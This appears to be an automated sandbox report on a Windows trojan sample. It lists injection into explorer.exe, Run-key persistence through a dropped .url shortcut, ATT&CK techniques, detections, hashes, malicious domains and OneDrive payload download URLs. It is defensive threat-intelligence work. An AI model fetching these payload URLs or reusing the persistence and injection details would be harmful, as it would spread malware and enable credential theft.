          Source: C:\Users\user\Desktop\0321423605241625.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02175D0C
          Source: C:\Users\user\Desktop\0321423605241625.exe Code function: GetLocaleInfoA,0_2_0217AA04
          Source: C:\Users\user\Desktop\0321423605241625.exe Code function: GetLocaleInfoA,0_2_0217A9B8
          Source: C:\Users\user\Desktop\0321423605241625.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02175E18
          Source: C:\Users\user\Desktop\0321423605241625.exe Code function: 0_2_02179438 GetLocalTime,0_2_02179438
          Source: C:\Users\user\Desktop\0321423605241625.exe Code function: 0_2_0217B938 GetVersionExA,0_2_0217B938

          Stealing of Sensitive Information

          Source: Yara match | File source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match | File source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 812 Process Injection | 1 Masquerading | 1 Input Capture | 1 System Time Discovery | Remote Services | 1 Input Capture | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | 1 Shared Modules | 1 DLL Side-Loading | 1 Registry Run Keys / Startup Folder | 1 Virtualization/Sandbox Evasion | LSASS Memory | 221 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 2 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | 1 DLL Side-Loading | 812 Process Injection | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 3 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Software Packing | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 114 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          [Behavior graph (ID 756155; sample 0321423605241625.exe; start date 29/11/2022; architecture WINDOWS; score 100). Process tree: 0321423605241625.exe started colorcpl.exe and dropped C:\Users\Public\Libraries\Mwqrxeuz.exe (PE32); colorcpl.exe injected into explorer.exe; explorer.exe started Mwqrxeuz.exe and raserver.exe; Mwqrxeuz.exe started colorcpl.exe; raserver.exe started cmd.exe, which started conhost.exe.]

          Source | Detection | Scanner | Label
          0321423605241625.exe | 36% | ReversingLabs | Win32.Trojan.Generic
          0321423605241625.exe | 41% | Virustotal |
          0321423605241625.exe | 100% | Avira | HEUR/AGEN.1214697
          0321423605241625.exe | 100% | Joe Sandbox ML |

          Source | Detection | Scanner | Label
          C:\Users\Public\Libraries\Mwqrxeuz.exe | 100% | Avira | HEUR/AGEN.1214697
          C:\Users\Public\Libraries\Mwqrxeuz.exe | 100% | Joe Sandbox ML |
          C:\Users\Public\Libraries\Mwqrxeuz.exe | 36% | ReversingLabs | Win32.Trojan.Generic

          Source | Detection | Scanner | Label
          1.0.colorcpl.exe.10410000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.0.0321423605241625.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1214697
          0.2.0321423605241625.exe.2170000.0.unpack | 100% | Avira | TR/Hijacker.Gen
          1.0.colorcpl.exe.10410000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.2.raserver.exe.525796c.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
          1.0.colorcpl.exe.10410000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.2.colorcpl.exe.10410000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          9.2.raserver.exe.a3cda0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
          0.2.0321423605241625.exe.3baeed8.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          3.2.Mwqrxeuz.exe.2598248.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.0.colorcpl.exe.10410000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.0321423605241625.exe.2231218.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
          0.2.0321423605241625.exe.2278248.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

          No Antivirus matches

          Source | Detection | Scanner | Label
          www.rematedeldia.com/euv4/ | 100% | Avira URL Cloud | malware

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.kuechenpruefer.com | 217.160.0.95 | true | true | | unknown
          librairie-adrienne.com | 192.0.78.141 | true | true | | unknown
          l-0003.l-dc-msedge.net | 13.107.43.12 | true | false | | unknown
          www.customapronsnow.com | 52.85.92.84 | true | true | | unknown
          shops.myshopify.com | 23.227.38.74 | true | false | | unknown
          www.thecuratedpour.com | unknown | unknown | true | | unknown
          onedrive.live.com | unknown | unknown | false | | high
          www.segurofunerarioar.com | unknown | unknown | true | | unknown
          www.librairie-adrienne.com | unknown | unknown | true | | unknown
          ppqfqw.ph.files.1drv.com | unknown | unknown | false | | high
          www.rematedeldia.com | unknown | unknown | true | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          www.rematedeldia.com/euv4/ | true | Avira URL Cloud: malware | low
          https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PRESPN2npo | false | | high
          https://ppqfqw.ph.files.1drv.com/y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3rlGujQmh2dpM-9vT8IEOnYjevggDBPg3L6krVTX5rpZ6Y9fWqq7mXN8HP0HSdlr6-fMy35G8DvzJqxvSasnXVIJpB-5dNG-tdgdNk_U_XYoTZ1ccJrC1sgInwIFqmsOi4T1bkt9-CIDRF_pvQqcEQA/Mwqrxeuzvim?download&psid=1 | false | | high

          Name | Source | Malicious | Antivirus Detection | Reputation
          https://ppqfqw.ph.files.1drv.com/y4mcSg4TVpIg-eA6Y1ciUp4Dzz62AcO4SwOj-306Rp8dovP_vJs6bBF8upLxcpz7eVd | 0321423605241625.exe, 00000000.00000002.307309131.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301144762.0000000000850000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://www.autoitscript.com/autoit3/J | explorer.exe, 00000002.00000000.351845290.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.310261242.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.434855289.0000000000921000.00000004.00000020.00020000.00000000.sdmp | false | | high
          https://ppqfqw.ph.files.1drv.com/y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3 | 0321423605241625.exe, 00000000.00000003.301289184.000000000089F000.00000004.00000020.00020000.00000000.sdmp | false | | high
          https://ppqfqw.ph.files.1drv.com/U0 | 0321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmp | false | | high
          https://ppqfqw.ph.files.1drv.com/ | 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307357943.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmp | false | | high
          https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PR | 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmp | false | | high
          https://ppqfqw.ph.files.1drv.com/_ | 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmp | false | | high
          https://onedrive.live.com/ | 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmp | false | | high
          https://ppqfqw.ph.files.1drv.com/s | 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmp | false | | high

          IP | Domain | Country | ASN | ASN Name | Malicious
          13.107.43.12 | l-0003.l-dc-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false

          Joe Sandbox Version: 36.0.0 Rainbow Opal
          Analysis ID: 756155
          Start date and time: 2022-11-29 18:23:06 +01:00
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 10m 2s
          Hypervisor based Inspection enabled: false
          Report type: full
          Sample file name: 0321423605241625.exe
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed: 12
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 1
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Detection: MAL
          Classification: mal100.troj.evad.winEXE@11/5@8/1
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 98.9% (good quality ratio 86.8%)
          • Quality average: 75%
          • Quality standard deviation: 33.7%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 50
          • Number of non-executed functions: 180
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe
          • Excluded IPs from analysis (whitelisted): 13.107.42.13
          • Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, client.wns.windows.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-web-geo.onedrive.akadns.net, ph-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-ph-files-geo.onedrive.akadns.net, odc-ph-files-brs.onedrive.akadns.net
          • Not all processes were analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Time | Type | Description
          18:23:59 | API Interceptor | 1x Sleep call for process: 0321423605241625.exe modified
          18:24:05 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Mwqrxeuz C:\Users\Public\Libraries\zuexrqwM.url
          18:24:14 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Mwqrxeuz C:\Users\Public\Libraries\zuexrqwM.url
          18:24:18 | API Interceptor | 1x Sleep call for process: Mwqrxeuz.exe modified

          Match | Associated Sample Name / URL | Detection | Context
          13.107.43.12 | SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe | malicious |
          13.107.43.12 | 000211232334_33455INVOICE .vbs | malicious |
          13.107.43.12 | IMG_2022112022-6468.vbs | malicious |
          13.107.43.12 | SecuriteInfo.com.Win32.Malware-gen.5701.3804.exe | malicious |
          13.107.43.12 | Swift Payment Copy .xla.exe | malicious |
          13.107.43.12 | 03231262773662516627.exe | malicious |
          13.107.43.12 | Cogigqkbkuvzlh.exe | malicious |
          13.107.43.12 | Inquiry For RE UGS - LCL - INDONESIA.exe | malicious |
          13.107.43.12 | AZ032441352671726.exe | malicious |
          13.107.43.12 | CONFD-31 PROPOSED VILLA (B+G+1+PH) + MAJLIS .exe | malicious |
          13.107.43.12 | Requisition Order.exe | malicious |
          13.107.43.12 | Delivery report.exe | malicious |
          13.107.43.12 | SecuriteInfo.com.Win32.Evo-gen.7732.16870.exe | malicious |
          13.107.43.12 | SecuriteInfo.com.Variant.Tedy.237947.19482.16084.exe | malicious |
          13.107.43.12 | Huat Tradings - Products Inquiry.exe | malicious |
          13.107.43.12 | Products Inquiry_Document.exe | malicious |
          13.107.43.12 | SecuriteInfo.com.Variant.Ransom.Gendarmerie.22.23590.8978.exe | malicious |
          13.107.43.12 | SecuriteInfo.com.Win32.PWSX-gen.19083.21703.exe | malicious |
          13.107.43.12 | Invoice Overdue & Error INV NR 522236562 DTD 25.10.2021 SK.exe | malicious |
          13.107.43.12 | PRODUCTS LIST & DESIGN.exe | malicious |

          Match | Associated Sample Name / URL | Detection | Context
          www.kuechenpruefer.com | 045624132441524.exe | malicious | 217.160.0.95
          www.kuechenpruefer.com | Prilozena nova objednavka.exe | malicious | 217.160.0.95
          www.kuechenpruefer.com | SK034252562672.exe | malicious | 217.160.0.95
          www.kuechenpruefer.com | Izvod racuna.exe | malicious | 217.160.0.95
          www.kuechenpruefer.com | New order list.exe | malicious | 217.160.0.95
          www.kuechenpruefer.com | Deklarata e llogarise.exe | malicious | 217.160.0.95
          www.kuechenpruefer.com | Proforma Fatura ektedir.exe | malicious | 217.160.0.95
          www.kuechenpruefer.com | Nueva orden de compra.exe | malicious | 217.160.0.95
          www.kuechenpruefer.com | Copia de pago bancario.exe | malicious | 217.160.0.95
          l-0003.l-dc-msedge.net | SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | malicious | 13.107.43.12
          l-0003.l-dc-msedge.net | SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe | malicious | 13.107.43.12
          l-0003.l-dc-msedge.net | 000211232334_33455INVOICE .vbs | malicious | 13.107.43.12
          l-0003.l-dc-msedge.net | IMG_2022112022-6468.vbs | malicious | 13.107.43.12
          l-0003.l-dc-msedge.net | SecuriteInfo.com.Win32.Malware-gen.5701.3804.exe | malicious | 13.107.43.12
          l-0003.l-dc-msedge.net | Swift Payment Copy .xla.exe | malicious | 13.107.43.12
          l-0003.l-dc-msedge.net | 03231262773662516627.exe | malicious | 13.107.43.12
          l-0003.l-dc-msedge.net | Cogigqkbkuvzlh.exe | malicious |
                                                                                              • 13.107.43.12
                                                                                              Inquiry For RE UGS - LCL - INDONESIA.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              AZ032441352671726.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              CONFD-31 PROPOSED VILLA (B+G+1+PH) + MAJLIS .exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Requisition Order.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              PRODUCTS_PROFILE.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Delivery report.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              SecuriteInfo.com.Win32.Evo-gen.7732.16870.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              SecuriteInfo.com.Variant.Tedy.237947.19482.16084.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Huat Tradings - Products Inquiry.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Products Inquiry_Document.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              SecuriteInfo.com.Variant.Ransom.Gendarmerie.22.23590.8978.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              SecuriteInfo.com.Win32.PWSX-gen.19083.21703.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
Match    Associated Sample Name / URL    SHA 256    Detection    Link    Context
                                                                                              No context
                                                                                              Process:C:\Users\user\Desktop\0321423605241625.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):167894
                                                                                              Entropy (8bit):7.836989185036909
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:oX7iyI1g1T9ZeIssvAq21B+OXSuWQ/e9WMEnOuljlyTe9iotErmwT46lcHNo9igQ:oX2yA8T9ZeIPoHBSDGDM9u4K9ioQESTQ
                                                                                              MD5:A4230DEF1381688D96A42C48723B6FB4
                                                                                              SHA1:DAC39DC194EB7525BE189B5BE47E7B3A70E8DF0B
                                                                                              SHA-256:C3F4FA12B0F5A069BD9CEF7EE09AEEE8DADB2199A3A0F05009E068C0CC0CB3F8
                                                                                              SHA-512:E6EA4CB1E3693DD84145D6475EA2EBB2D01C4D1BA980CE42924DC83D396669CC423C6E5589E050CA33FD1B1EF7B21AAF2DC7B4674294917684557D5C716CFB13
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Process:C:\Users\user\Desktop\0321423605241625.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):750592
                                                                                              Entropy (8bit):6.881084216281991
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:i1qMhtVLzLypCggIh36+O9dvjpQVeri4Z2qKk/RqIkr:WFhHzmQgn6+8T/r7saqI
                                                                                              MD5:EDB1382C354EC6C09C53473E5335703A
                                                                                              SHA1:A1A5FBFCE034731CBA1072BAB6B97B26C8A90C79
                                                                                              SHA-256:C2C6EEC67A1561C3A49179DDF756480876D92588C2E83D64246A04C3D724CB3D
                                                                                              SHA-512:7A39E02E0C6B5036763A7646A5960DE36230EAEF32DA6B36687AA71170BD2125775888EC71FF112FB76A38D17D77B650089257043288FAE82598DEE5E6987ED9
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 36%
                                                                                              Reputation:low
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................b.......&.......0....@..............................................@........................... ...%.......$...................p...n...........................`......................$'...............................text...,........................... ..`.itext..$.... ...................... ..`.data........0......................@....bss....`6...............................idata...%... ...&..................@....tls....4....P...........................rdata.......`......................@..@.reloc...n...p...p..................@..B.rsrc....$.......$...N..............@..@.....................r..............@..@................................................................................................
                                                                                              Process:C:\Users\user\Desktop\0321423605241625.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                              Process:C:\Users\user\Desktop\0321423605241625.exe
                                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Mwqrxeuz.exe">), ASCII text, with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):100
                                                                                              Entropy (8bit):5.027627100346909
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMiCK0dAIvsGKd7DKCov:HRYFVmTWDyzM7vsb7uCy
                                                                                              MD5:7DDCB7FA3CEA8198D5ADEBF8F7797F74
                                                                                              SHA1:4552A0DFE75A7CF4875DDB3575800AE137F88E04
                                                                                              SHA-256:7E678198AFD5C53ADDBD2133245E72EBF9D6885F20496F5ACAEF2CF56C54856D
                                                                                              SHA-512:D985A2CEF6438CAA20E784A43CF752BCB1AF2608633C050DF55A194766D1C1BC3D106D7786D63E316DEF0E011E98D263C99510D7E843E8A6709F4DDFD1BA67F3
                                                                                              Malicious:false
                                                                                              Yara Hits:
                                                                                              • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\zuexrqwM.url, Author: @itsreallynick (Nick Carr)
                                                                                              • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\zuexrqwM.url, Author: @itsreallynick (Nick Carr)
                                                                                              Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Mwqrxeuz.exe"..IconIndex=31..HotKey=29..
                                                                                              Process:C:\Users\user\Desktop\0321423605241625.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):167894
                                                                                              Entropy (8bit):7.836989185036909
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:oX7iyI1g1T9ZeIssvAq21B+OXSuWQ/e9WMEnOuljlyTe9iotErmwT46lcHNo9igQ:oX2yA8T9ZeIPoHBSDGDM9u4K9ioQESTQ
                                                                                              MD5:A4230DEF1381688D96A42C48723B6FB4
                                                                                              SHA1:DAC39DC194EB7525BE189B5BE47E7B3A70E8DF0B
                                                                                              SHA-256:C3F4FA12B0F5A069BD9CEF7EE09AEEE8DADB2199A3A0F05009E068C0CC0CB3F8
                                                                                              SHA-512:E6EA4CB1E3693DD84145D6475EA2EBB2D01C4D1BA980CE42924DC83D396669CC423C6E5589E050CA33FD1B1EF7B21AAF2DC7B4674294917684557D5C716CFB13
                                                                                              Malicious:false
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):6.881084216281991
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.38%
                                                                                              • InstallShield setup (43055/19) 0.43%
                                                                                              • Windows Screen Saver (13104/52) 0.13%
                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              File name:0321423605241625.exe
                                                                                              File size:750592
                                                                                              MD5:edb1382c354ec6c09c53473e5335703a
                                                                                              SHA1:a1a5fbfce034731cba1072bab6b97b26c8a90c79
                                                                                              SHA256:c2c6eec67a1561c3a49179ddf756480876d92588c2e83d64246a04c3d724cb3d
